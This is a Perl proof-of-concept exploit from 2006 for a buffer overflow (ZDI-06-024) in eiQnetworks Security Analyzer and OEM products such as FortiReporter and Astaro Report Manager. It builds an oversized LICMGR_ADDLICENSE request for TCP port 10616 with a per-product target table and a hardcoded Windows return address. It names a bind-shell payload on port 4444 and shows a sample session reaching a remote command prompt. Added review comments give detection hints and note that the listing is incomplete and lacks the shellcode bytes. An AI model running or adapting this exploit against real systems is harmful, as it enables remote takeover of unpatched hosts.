Exploit for Security Analyzer by eiQnetworks
`#!/usr/bin/perl -w
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com) - 03/23/2006
# Bug found by Titon of Bastard Labs.
# http://www.zerodayinitiative.com/advisories/ZDI-06-024.html
# Exploit for * Security Analyzer by eiQnetworks (OEM for Several vendors)
# kfinisterre@kfinisterre01:~$ ./eiQ_multi.pl 2
# *** Target: NetworkSecurityAnalyzerv4.2.27.exe, Len: 1262
# Exploiting
# kfinisterre@kfinisterre01:~$ telnet 4444
# Trying
# Connected to
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
# C:\Program Files\Network Security Analyzer\fwa>exit
# exit
# Connection closed by foreign host.
use IO::Socket;
# Proof-of-concept client for ZDI-06-024: it builds one oversized
# LICMGR_ADDLICENSE request and writes it to TCP port 10616 on the named host.
# NOTE(review): the listing as captured here is incomplete -- the closing
# braces of the usage block are missing and no payload bytes follow "$sc =" --
# so it does not compile as shown.
# Defensive relevance: the affected products are the ones named in %tgts; see
# the advisory linked in the header for fixed versions, and keep port 10616
# reachable only from hosts that need it.
$hostname = "";
# Value placed at the very end of the request argument (see $buf below);
# presumably it lands on the saved return address. It is an address inside
# ws2_32.dll and is therefore tied to one Windows build, as the alternative
# on the next line shows.
$retval = 0x71ab773b; # jmp EBX on WinXP SP2 ws2_32.dll (metasploit)
#$retval = 0x750316e2; # call EBX on Windows 2000 SP4 ws2_32.dll (metasploit)
# Binary hunts performed by JxT and Titon
# Target table: index => "binary name:length". The length is the number of
# bytes that sit between the "LICMGR_ADDLICENSE&" prefix and $ret in the
# request (see $nops and $buf below).
$tgts{"0"} = "G2SRv4.0.36.exe:1262";
$tgts{"1"} = "EnterpriseSecurityAnalyzerv21.exe:494";
$tgts{"2"} = "NetworkSecurityAnalyzerv4.2.27.exe:1262";
$tgts{"3"} = "NetworkSecurityAnalyzerv5.exe:1262";
$tgts{"4"} = "FortiReporter_4.2.26.exe:1262";
$tgts{"5"} = "AstaroReportManagerV37.exe:000"; # Unknown.. need serial
$tgts{"6"} = "AstaroReportManager_4.2.29.exe:1262";
# Reads <target> <host> from @ARGV. The comma expression evaluates to
# $hostname, so the usage text is printed whenever no host was supplied.
unless (($target,$hostname) = @ARGV,$hostname) {
print "\n Security Analyzer by eiQnetworks exploit, kf \(kf_lists[at]digitalmunition[dot]com\) - 03/23/2006\n";
print "\n\nUsage: $0 <target> <host>\n\nTargets:\n\n";
foreach $key (sort(keys %tgts)) {
# NOTE(review): $a and $b are the package globals that sort() uses; they are
# reused here as plain scratch variables for the name and the length.
($a,$b) = split(/\:/,$tgts{"$key"});
print "\t$key . $a\n";
print "\n";
exit 1;
# pack "l" emits $retval as a 32-bit integer in the byte order of the machine
# running the script.
$ret = pack("l", ($retval));
# Look up the chosen target; $a is the binary name, $b the per-target length.
($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $a, Len: $b\n";
# NOTE(review): the payload bytes are absent from this capture. The generator
# comment below describes a bind shell on TCP 4444, so an unexpected listener
# on 4444/tcp on an analyzer host is a post-compromise indicator.
$sc =
# win32_bind - EXITFUNC=seh LPORT=4444
# Size=344 Encoder=PexFnstenvSub http://metasploit.com
# Filler sized so that padding plus payload occupy exactly the per-target
# length; $ret then follows immediately.
$nops = "A" x ($b - length($sc));
# Request layout: command name, "&", argument, "&". Detection: the argument
# is 494 or 1262 bytes plus 4 (per %tgts), presumably far longer than any
# legitimate licence string -- confirm against normal traffic before alerting
# on length alone.
$buf = "LICMGR_ADDLICENSE&" . $nops . $sc . $ret . "&";
printf "Exploiting $hostname\n";
# Plain TCP connection to port 10616; this script sends nothing before the
# request itself, i.e. no login or handshake step.
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$hostname, PeerPort=>10616, Type=>SOCK_STREAM);
$sock or die "no socket :$!\n";
print $sock "$buf";
print "Try connecting to port 4444 on the target.\n";